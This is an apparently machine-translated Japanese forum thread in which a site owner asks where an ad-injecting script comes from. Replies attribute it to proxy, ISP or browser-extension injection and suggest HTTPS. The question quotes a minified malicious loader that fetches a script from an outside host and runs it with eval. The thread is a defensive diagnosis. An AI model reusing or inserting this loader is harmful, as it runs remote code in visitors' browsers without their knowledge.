2016-11-24 7 views
6

私はこの問題で少し迷っていますので、ご容赦ください。私はそこに他のスレッドがあることを知っていますが、私は答えを見つけることができません。ウェブサイトでマルウェアを検索する

ロードされたサイトでは、ユーザーがクリックした場所に関係なく、ブラウザで広告付きの追加タブが開きます。

私は、ブラウザのコンソールを見て、これまでに見つけることができたことはそれはいくつかのjsが

http://cdn.mecash.ru/js/replace.js 

このファイルは

!function(w){if(w.self==w.top){var r=new XMLHttpRequest;r.onload=function(){eval(this.responseText)},r.open("get","//myclk.net/js/tx.js",!0),r.send()}}(window); 

と私は疑うこのtx.jsを見てを含むファイルにロードされていますこれはハッカーによって注入されたものです。

問題は、私はホスト上のファイルを見てきたし、いずれかが含まれたり、このjsの何かを見つけることができないということです。..

誰かが私を助けて、どこか、おそらくどのように私は見つけることができます伝えることができますそれ?

+0

実際には、この種のファイルは、「ブラウザ拡張機能がインストールされている」場合は「サードパーティーのプロキシ」、ページが要求されたときはHTMLコードに直接ISPによって挿入されます。あなたはサーバー上の実際のコードでこれを見つけることはできませんが、クライアントにはこのjsが含まれています。中間の変更でそのような人を避けるために 'https 'を使うのがよいでしょう。 –

+0

ISPにマルウェアを挿入するjs -.- – Viney

+1

ありがとうございます。つまり、私はそれを見つけられないので、ファイルの掘り下げをやめることができます。 ISPからの連絡があってもサポートに連絡することはできません。だから、ここのオプションはhttpsで、そして/または私のホスティングプロバイダを変更していますか? –

答えて

4

実際には、この種のファイルは、データがサーバーからクライアントに送信されるときに注入されます。 あなたの実際のコードのdosen'tは、スクリプトが含まれていますが、それらが注入され、クライアントマシン上で実行される。..

おそらくによって注入:使用

  • サードパーティ製のプロキシ、プロキシサーバ。
  • ISPによって注入されることもあります。
  • 悪意のある/侵害されたブラウザ拡張機能がインストールされています。

httpの代わりにhttpsを超えるコンテンツを転送することで、プロキシ/ ISPの注入を回避できます。ただし、拡張機能をアンインストールするだけで、browswer extensionsによる注入を回避できます。

+0

ありがとうございました。 –

関連する問題